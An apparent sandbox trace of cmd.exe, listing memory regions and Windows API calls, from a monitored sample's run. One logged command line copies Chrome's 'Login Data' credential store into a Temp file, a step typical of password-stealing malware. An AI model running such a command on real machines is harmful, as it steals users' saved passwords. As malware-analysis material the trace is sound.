id = 17799 start_va = 0x400000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 17800 start_va = 0x74a40000 end_va = 0x74b1ffff monitored = 0 entry_point = 0x74a53980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 17801 start_va = 0x74e60000 end_va = 0x74fddfff monitored = 0 entry_point = 0x74f11b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 17802 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 17803 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 17868 start_va = 0x600000 end_va = 0x6bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 17869 start_va = 0x76ff0000 end_va = 0x770adfff monitored = 0 entry_point = 0x77025630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 17870 start_va = 0x400000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 17871 start_va = 0x440000 end_va = 0x53ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 17872 start_va = 0x6c0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006c0000" filename = "" Region: id = 17873 start_va = 0x7c0000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000007c0000" filename = "" Region: id = 17874 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 17875 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 17876 start_va = 0x1d0000 end_va = 0x1dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 17877 start_va = 0x1e0000 end_va = 0x1effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 17878 start_va = 0x750b0000 end_va = 0x7512afff monitored = 0 entry_point = 0x750ce970 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 17879 start_va = 0x77360000 end_va = 0x773a3fff monitored = 0 entry_point = 0x77379d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 17880 start_va = 0x74ff0000 end_va = 0x7509cfff monitored = 0 entry_point = 0x75004f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 17881 start_va = 0x746c0000 end_va = 0x746ddfff monitored = 0 entry_point = 0x746cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 17882 start_va = 0x746b0000 end_va = 0x746b9fff monitored = 0 entry_point = 0x746b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 17883 start_va = 0x771d0000 end_va = 0x77227fff monitored = 0 entry_point = 0x772125c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 17884 start_va = 0x6dd60000 end_va = 0x6dd87fff monitored = 0 entry_point = 0x6dd67820 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\SysWOW64\\ntmarta.dll" (normalized: "c:\\windows\\syswow64\\ntmarta.dll") Region: id = 17885 start_va = 0x6dce0000 end_va = 0x6dd50fff monitored = 0 entry_point = 0x6dd369e0 region_type = mapped_file name = "efswrt.dll" filename = "\\Windows\\SysWOW64\\efswrt.dll" (normalized: "c:\\windows\\syswow64\\efswrt.dll") Region: id = 17886 start_va = 0x77260000 end_va = 0x772ecfff monitored = 0 entry_point = 0x772a9b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 17887 start_va = 0x74880000 end_va = 0x74a3cfff monitored = 0 entry_point = 0x74962a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 17888 start_va = 0x77350000 end_va = 0x7735bfff monitored = 0 entry_point = 0x77353930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 17889 start_va = 0x77870000 end_va = 0x77901fff monitored = 0 entry_point = 0x778a8cf0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\SysWOW64\\oleaut32.dll" (normalized: "c:\\windows\\syswow64\\oleaut32.dll") Region: id = 17890 start_va = 0x74290000 end_va = 0x74357fff monitored = 0 entry_point = 0x742fae90 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\SysWOW64\\WinTypes.dll" (normalized: "c:\\windows\\syswow64\\wintypes.dll") Region: id = 17891 start_va = 0x7c0000 end_va = 0x8a9fff monitored = 0 entry_point = 0x7fd650 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\SysWOW64\\ole32.dll" (normalized: "c:\\windows\\syswow64\\ole32.dll") Region: id = 17892 start_va = 0x920000 end_va = 0x92ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000920000" filename = "" Region: id = 17893 start_va = 0x6dc90000 end_va = 0x6dcd8fff monitored = 0 entry_point = 0x6dc96450 region_type = mapped_file name = "edputil.dll" filename = "\\Windows\\SysWOW64\\edputil.dll" (normalized: "c:\\windows\\syswow64\\edputil.dll") Region: id = 17894 start_va = 0x74c60000 end_va = 0x74ca4fff monitored = 0 entry_point = 0x74c7de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 17895 start_va = 0x75130000 end_va = 0x7527efff monitored = 0 entry_point = 0x751e6820 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 17896 start_va = 0x74cb0000 end_va = 0x74df6fff monitored = 0 entry_point = 0x74cc1cf0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 17897 start_va = 0x540000 end_va = 0x569fff monitored = 0 entry_point = 0x545680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 17898 start_va = 0x930000 end_va = 0xab7fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000930000" filename = "" Region: id = 17899 start_va = 0x75450000 end_va = 0x7547afff monitored = 0 entry_point = 0x75455680 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 17900 start_va = 0x1f0000 end_va = 0x1f1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 17901 start_va = 0x540000 end_va = 0x540fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000540000" filename = "" Region: id = 17902 start_va = 0x550000 end_va = 0x550fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 17903 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 17904 start_va = 0xac0000 end_va = 0xc40fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ac0000" filename = "" Region: id = 17905 start_va = 0x4d80000 end_va = 0x617ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004d80000" filename = "" Region: id = 17906 start_va = 0x6180000 end_va = 0x657afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006180000" filename = "" Thread: id = 110 os_tid = 0xd64 [0299.723] GetModuleHandleA (lpModuleName=0x0) returned 0xd20000 [0299.723] __set_app_type (_Type=0x1) [0299.723] __p__fmode () returned 0x770a4d6c [0299.723] __p__commode () returned 0x770a5b1c [0299.723] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xd35200) returned 0x0 [0299.724] __getmainargs (in: _Argc=0xd460e8, _Argv=0xd460ec, _Env=0xd460f0, _DoWildCard=0, _StartInfo=0xd460fc | out: _Argc=0xd460e8, _Argv=0xd460ec, _Env=0xd460f0) returned 0 [0299.724] GetCurrentThreadId () returned 0xd64 [0299.724] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xd64) returned 0x84 [0299.724] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74a40000 [0299.724] GetProcAddress (hModule=0x74a40000, lpProcName="SetThreadUILanguage") returned 0x74a82510 [0299.724] SetThreadUILanguage (LangId=0x0) returned 0x409 [0299.731] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0299.732] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x19ff18 | out: phkResult=0x19ff18*=0x0) returned 0x2 [0299.732] VirtualQuery (in: lpAddress=0x19ff1f, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x19f000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0299.732] VirtualQuery (in: lpAddress=0xa0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa0000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0299.732] VirtualQuery (in: lpAddress=0xa1000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa1000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0299.732] VirtualQuery (in: lpAddress=0xa3000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0xa3000, AllocationBase=0xa0000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0299.732] VirtualQuery (in: lpAddress=0x1a0000, lpBuffer=0x19fed0, dwLength=0x1c | out: lpBuffer=0x19fed0*(BaseAddress=0x1a0000, AllocationBase=0x1a0000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0299.732] GetConsoleOutputCP () returned 0x1b5 [0299.737] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd4f460 | out: lpCPInfo=0xd4f460) returned 1 [0299.737] SetConsoleCtrlHandler (HandlerRoutine=0xd40e40, Add=1) returned 1 [0299.738] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.738] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x0) returned 1 [0299.750] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.750] GetConsoleMode (in: hConsoleHandle=0x3c, lpMode=0xd4f40c | out: lpMode=0xd4f40c) returned 1 [0299.752] _get_osfhandle (_FileHandle=1) returned 0x3c [0299.752] SetConsoleMode (hConsoleHandle=0x3c, dwMode=0x7) returned 1 [0299.753] _get_osfhandle (_FileHandle=0) returned 0x38 [0299.753] GetConsoleMode (in: hConsoleHandle=0x38, lpMode=0xd4f408 | out: lpMode=0xd4f408) returned 1 [0299.755] _get_osfhandle (_FileHandle=0) returned 0x38 [0299.755] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1a7) returned 1 [0299.767] GetEnvironmentStringsW () returned 0x448120* [0299.768] GetProcessHeap () returned 0x440000 [0299.768] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xbc4) returned 0x448cf0 [0299.768] FreeEnvironmentStringsA (penv="=") returned 1 [0299.768] GetProcessHeap () returned 0x440000 [0299.768] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x4) returned 0x440550 [0299.768] GetEnvironmentStringsW () returned 0x448120* [0299.768] GetProcessHeap () returned 0x440000 [0299.768] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xbc4) returned 0x4498c0 [0299.768] FreeEnvironmentStringsA (penv="=") returned 1 [0299.768] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0299.769] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x49, lpcbData=0x19ee80*=0x1000) returned 0x2 [0299.769] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0299.769] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0299.769] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0299.769] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0299.769] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x4) returned 0x0 [0299.769] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0299.769] RegCloseKey (hKey=0x94) returned 0x0 [0299.769] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x19ee7c | out: phkResult=0x19ee7c*=0x94) returned 0x0 [0299.769] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x40, lpcbData=0x19ee80*=0x1000) returned 0x2 [0299.769] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x4) returned 0x0 [0299.769] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x1, lpcbData=0x19ee80*=0x1000) returned 0x2 [0299.769] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x0, lpcbData=0x19ee80*=0x4) returned 0x0 [0299.769] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0299.770] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x4, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x4) returned 0x0 [0299.770] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x19ee84, lpData=0x19ee88, lpcbData=0x19ee80*=0x1000 | out: lpType=0x19ee84*=0x0, lpData=0x19ee88*=0x9, lpcbData=0x19ee80*=0x1000) returned 0x2 [0299.770] RegCloseKey (hKey=0x94) returned 0x0 [0299.770] time (in: timer=0x0 | out: timer=0x0) returned 0x61e6ee4a [0299.770] srand (_Seed=0x61e6ee4a) [0299.770] GetCommandLineW () returned="/c copy \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\" \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1\" /V" [0299.770] GetCommandLineW () returned="/c copy \"C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data\" \"C:\\Users\\RDHJ0C~1\\AppData\\Local\\Temp\\DB1\" /V" [0299.770] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd57720 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0299.770] GetProcessHeap () returned 0x440000 [0299.770] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x210) returned 0x44a490 [0299.770] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x44a498, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0299.770] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0xd4f4a0, nSize=0x2000 | out: lpBuffer="") returned 0xc3 [0299.770] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0xd4f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x35 [0299.771] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0xd4f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0299.771] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0299.771] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0299.771] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0299.771] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0299.771] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0299.771] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0299.771] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0299.771] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0299.771] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0299.771] GetProcessHeap () returned 0x440000 [0299.772] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x448cf0) returned 1 [0299.772] GetEnvironmentStringsW () returned 0x44b290* [0299.772] GetProcessHeap () returned 0x440000 [0299.772] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xbdc) returned 0x448120 [0299.772] FreeEnvironmentStringsA (penv="=") returned 1 [0299.772] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0xd4f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x1b [0299.772] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0xd4f4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0299.772] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0299.772] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0299.772] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0299.772] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0299.772] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0299.772] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0299.772] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0299.772] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0299.773] GetProcessHeap () returned 0x440000 [0299.773] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x30) returned 0x448d08 [0299.773] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x19fc54 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0299.773] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x104, lpBuffer=0x19fc54, lpFilePart=0x19fc4c | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x19fc4c*="system32") returned 0x13 [0299.773] GetFileAttributesW (lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32")) returned 0x30 [0299.773] FindFirstFileW (in: lpFileName="C:\\Windows", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xb240a0a0, ftLastAccessTime.dwHighDateTime=0x1d70aa1, ftLastWriteTime.dwLowDateTime=0xb240a0a0, ftLastWriteTime.dwHighDateTime=0x1d70aa1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Windows", cAlternateFileName="")) returned 0x448d40 [0299.773] FindClose (in: hFindFile=0x448d40 | out: hFindFile=0x448d40) returned 1 [0299.773] FindFirstFileW (in: lpFileName="C:\\Windows\\system32", lpFindFileData=0x19f9d0 | out: lpFindFileData=0x19f9d0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x31bae0f4, ftCreationTime.dwHighDateTime=0x1d112dc, ftLastAccessTime.dwLowDateTime=0xd1400d1d, ftLastAccessTime.dwHighDateTime=0x1d7e767, ftLastWriteTime.dwLowDateTime=0xd1400d1d, ftLastWriteTime.dwHighDateTime=0x1d7e767, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="System32", cAlternateFileName="")) returned 0x448d40 [0299.774] FindClose (in: hFindFile=0x448d40 | out: hFindFile=0x448d40) returned 1 [0299.774] GetFileAttributesW (lpFileName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 0x30 [0299.774] SetCurrentDirectoryW (lpPathName="C:\\Windows\\System32" (normalized: "c:\\windows\\system32")) returned 1 [0299.774] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Windows\\System32") returned 1 [0299.774] GetProcessHeap () returned 0x440000 [0299.774] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x448120) returned 1 [0299.774] GetEnvironmentStringsW () returned 0x44bea8* [0299.775] GetProcessHeap () returned 0x440000 [0299.775] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0xc0c) returned 0x44cac0 [0299.775] FreeEnvironmentStringsA (penv="=") returned 1 [0299.775] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0xd57720 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0299.775] GetProcessHeap () returned 0x440000 [0299.775] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x448d08) returned 1 [0299.775] GetProcessHeap () returned 0x440000 [0299.775] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400e) returned 0x44d6d8 [0299.776] GetProcessHeap () returned 0x440000 [0299.776] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x114) returned 0x4405c8 [0299.776] GetProcessHeap () returned 0x440000 [0299.778] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x44d6d8) returned 1 [0299.778] GetConsoleOutputCP () returned 0x1b5 [0299.781] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xd4f460 | out: lpCPInfo=0xd4f460) returned 1 [0299.781] GetUserDefaultLCID () returned 0x409 [0299.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0xd534a0, cchData=8 | out: lpLCData=":") returned 2 [0299.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0299.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x19fd84, cchData=128 | out: lpLCData="0") returned 2 [0299.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x19fd84, cchData=128 | out: lpLCData="1") returned 2 [0299.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0xd534b0, cchData=8 | out: lpLCData="/") returned 2 [0299.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0xd53500, cchData=32 | out: lpLCData="Mon") returned 4 [0299.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0xd53540, cchData=32 | out: lpLCData="Tue") returned 4 [0299.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0xd53580, cchData=32 | out: lpLCData="Wed") returned 4 [0299.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0xd535c0, cchData=32 | out: lpLCData="Thu") returned 4 [0299.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0xd53600, cchData=32 | out: lpLCData="Fri") returned 4 [0299.782] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0xd53640, cchData=32 | out: lpLCData="Sat") returned 4 [0299.783] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0xd53680, cchData=32 | out: lpLCData="Sun") returned 4 [0299.783] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0xd534c0, cchData=8 | out: lpLCData=".") returned 2 [0299.783] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0xd534e0, cchData=8 | out: lpLCData=",") returned 2 [0299.783] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0299.785] GetProcessHeap () returned 0x440000 [0299.785] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x0, Size=0x20c) returned 0x440730 [0299.785] GetConsoleTitleW (in: lpConsoleTitle=0x440730, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\SysWOW64\\cmd.exe") returned 0x1b [0299.786] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x74a40000 [0299.786] GetProcAddress (hModule=0x74a40000, lpProcName="CopyFileExW") returned 0x74a5ffc0 [0299.786] GetProcAddress (hModule=0x74a40000, lpProcName="IsDebuggerPresent") returned 0x74a5b0b0 [0299.786] GetProcAddress (hModule=0x74a40000, lpProcName="SetConsoleInputExeNameW") returned 0x74f7b440 [0299.786] GetProcessHeap () returned 0x440000 [0299.786] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x400a) returned 0x44d6d8 [0299.786] GetProcessHeap () returned 0x440000 [0299.787] RtlFreeHeap (HeapHandle=0x440000, Flags=0x0, BaseAddress=0x44d6d8) returned 1 [0299.787] _wcsicmp (_String1="copy", _String2=")") returned 58 [0299.788] _wcsicmp (_String1="FOR", _String2="copy") returned 3 [0299.788] _wcsicmp (_String1="FOR/?", _String2="copy") returned 3 [0299.788] _wcsicmp (_String1="IF", _String2="copy") returned 6 [0299.788] _wcsicmp (_String1="IF/?", _String2="copy") returned 6 [0299.788] _wcsicmp (_String1="REM", _String2="copy") returned 15 [0299.788] _wcsicmp (_String1="REM/?", _String2="copy") returned 15 [0299.788] GetProcessHeap () returned 0x440000 [0299.788] RtlAllocateHeap (HeapHandle=0x440000, Flags=0x8, Size=0x58) returned 0x440948 [0299.788] 